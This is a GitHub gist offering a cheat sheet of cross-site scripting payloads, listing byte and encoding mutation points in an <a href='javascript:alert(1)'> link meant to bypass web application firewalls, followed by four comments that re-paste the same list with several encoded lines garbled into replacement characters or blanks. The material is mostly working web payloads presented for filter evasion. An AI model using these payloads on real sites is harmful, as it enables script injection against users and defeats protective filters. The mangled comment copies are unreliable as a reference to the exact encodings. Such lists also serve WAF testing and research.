Skip to content

Instantly share code, notes, and snippets.

@hackerscrolls
Last active September 6, 2024 15:38
Show Gist options
  • Save hackerscrolls/5c0990dfc734eeb4a9ce8cf2ccdf6fba to your computer and use it in GitHub Desktop.
Save hackerscrolls/5c0990dfc734eeb4a9ce8cf2ccdf6fba to your computer and use it in GitHub Desktop.
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
Bytes:
\x09 \x0a \x0c \x0d \x20
<a href\x20="javascript:alert(1)">
<a href=\x20"javascript:alert(1)">
[4]
Bytes:
\x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20
HTML Encoding:
&#x01; &#x02; &#x03; &#x04; &#x05; &#x06; &#x07; &#x08; &#x09; &#x0a; &#x0b; &#x0c; &#x0d; &#x0e; &#x0f; &#x10; &#x11; &#x12; &#x13; &#x14; &#x15; &#x16; &#x17; &#x18; &#x19; &#x1a; &#x1b; &#x1c; &#x1d; &#x1e; &#x1f; &#x20;
<a href="&Tab;javascript:alert(1)">
<a href="&#x001;javascript:alert(1)">
[5]
Bytes:
\x09 \x0a \x0d
HTML Encoding:
&#x09; &#x0a; &#x0d;
<a href="javas\x09cript:alert(1)">
<a href="javas&Tab;cript:alert(1)">
[6]
Bytes:
\x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0
URL Encode (bytes):
%09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0
HTML Encode (bytes):
&#x09; &#x0a; &#x0b; &#x0c; &#x0d; &#x20; &#x21; &#x2b; &#x2d; &#x3b; &#x7e; &#xa0;
UTF-8 Symbols:
\u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
URL Encode (UTF-8):
%e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf
HTML Encode (UTF-8):
&#x1680; &#x2000; &#x2001; &#x2002; &#x2003; &#x2004; &#x2005; &#x2006; &#x2007; &#x2008; &#x2009; &#x200a; &#x2028; &#x2029; &#x202f; &#x205f; &#x3000; &#xfeff
<a href="javascript:~alert(1)">
<a href="javascript://%0d%0aalert(1)">
<a href="javascript:\x0calert(1)">
<a href="javascript:%ef%bb%bfalert(1)">
<a href="javascript:&#xfeff;alert(1)">
-----------------------------------------
We use char codes to show non printable symbols
\x00 - ASCII hex code
\x20 - SPACE
\x0a - NEW LINE
\u0000 - UTF-8 char code
\u1680 - OGHAM SPACE MARK
\u2028 - LINE SEPARATOR
Encoding UTF-8 to URL isn’t obvious:
\u1680 -> %e1%9a%80
\u2028 -> %e2%80%a8
@Naresh-11
Copy link

<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]
Bytes:
\x09 \x0a \x0c \x0d \x20

<a href\x20="javascript:alert(1)">
<a href=\x20"javascript:alert(1)">

[4]
Bytes:
\x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20

HTML Encoding:
� � � � � � � � � � � � � � � � � � � � � � � � � � �

[5]
Bytes:
\x09 \x0a \x0d

HTML Encoding:

[6]
Bytes:
\x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0

URL Encode (bytes):
%09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0

HTML Encode (bytes):
� ! + - ; ~  

UTF-8 Symbols:
\u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff

URL Encode (UTF-8):
%e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf

HTML Encode (UTF-8):
                        
 
       &#xfeff


We use char codes to show non printable symbols
\x00 - ASCII hex code
\x20 - SPACE
\x0a - NEW LINE

\u0000 - UTF-8 char code
\u1680 - OGHAM SPACE MARK
\u2028 - LINE SEPARATOR

Encoding UTF-8 to URL isn’t obvious:
\u1680 -> %e1%9a%80
\u2028 -> %e2%80%a8

@Naresh-11
Copy link

<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]
Bytes:
\x09 \x0a \x0c \x0d \x20

<a href\x20="javascript:alert(1)">
<a href=\x20"javascript:alert(1)">

[4]
Bytes:
\x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20

HTML Encoding:
� � � � � � � � � � � � � � � � � � � � � � � � � � �

[5]
Bytes:
\x09 \x0a \x0d

HTML Encoding:

[6]
Bytes:
\x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0

URL Encode (bytes):
%09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0

HTML Encode (bytes):
� ! + - ; ~  

UTF-8 Symbols:
\u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff

URL Encode (UTF-8):
%e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf

HTML Encode (UTF-8):
                        
 
       &#xfeff


We use char codes to show non printable symbols
\x00 - ASCII hex code
\x20 - SPACE
\x0a - NEW LINE

\u0000 - UTF-8 char code
\u1680 - OGHAM SPACE MARK
\u2028 - LINE SEPARATOR

Encoding UTF-8 to URL isn’t obvious:
\u1680 -> %e1%9a%80
\u2028 -> %e2%80%a8

@Naresh-11
Copy link

<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]
Bytes:
\x09 \x0a \x0c \x0d \x20

<a href\x20="javascript:alert(1)">
<a href=\x20"javascript:alert(1)">

[4]
Bytes:
\x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20

HTML Encoding:
� � � � � � � � � � � � � � � � � � � � � � � � � � �

[5]
Bytes:
\x09 \x0a \x0d

HTML Encoding:

[6]
Bytes:
\x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0

URL Encode (bytes):
%09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0

HTML Encode (bytes):
� ! + - ; ~  

UTF-8 Symbols:
\u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff

URL Encode (UTF-8):
%e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf

HTML Encode (UTF-8):
                        
 
       &#xfeff


We use char codes to show non printable symbols
\x00 - ASCII hex code
\x20 - SPACE
\x0a - NEW LINE

\u0000 - UTF-8 char code
\u1680 - OGHAM SPACE MARK
\u2028 - LINE SEPARATOR

Encoding UTF-8 to URL isn’t obvious:
\u1680 -> %e1%9a%80
\u2028 -> %e2%80%a8

@Naresh-11
Copy link

<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]
Bytes:
\x09 \x0a \x0c \x0d \x20

<a href\x20="javascript:alert(1)">
<a href=\x20"javascript:alert(1)">

[4]
Bytes:
\x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20

HTML Encoding:
� � � � � � � � � � � � � � � � � � � � � � � � � � �

[5]
Bytes:
\x09 \x0a \x0d

HTML Encoding:

[6]
Bytes:
\x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0

URL Encode (bytes):
%09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0

HTML Encode (bytes):
� ! + - ; ~  

UTF-8 Symbols:
\u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff

URL Encode (UTF-8):
%e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf

HTML Encode (UTF-8):
                        
 
       &#xfeff


We use char codes to show non printable symbols
\x00 - ASCII hex code
\x20 - SPACE
\x0a - NEW LINE

\u0000 - UTF-8 char code
\u1680 - OGHAM SPACE MARK
\u2028 - LINE SEPARATOR

Encoding UTF-8 to URL isn’t obvious:
\u1680 -> %e1%9a%80
\u2028 -> %e2%80%a8
dx

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment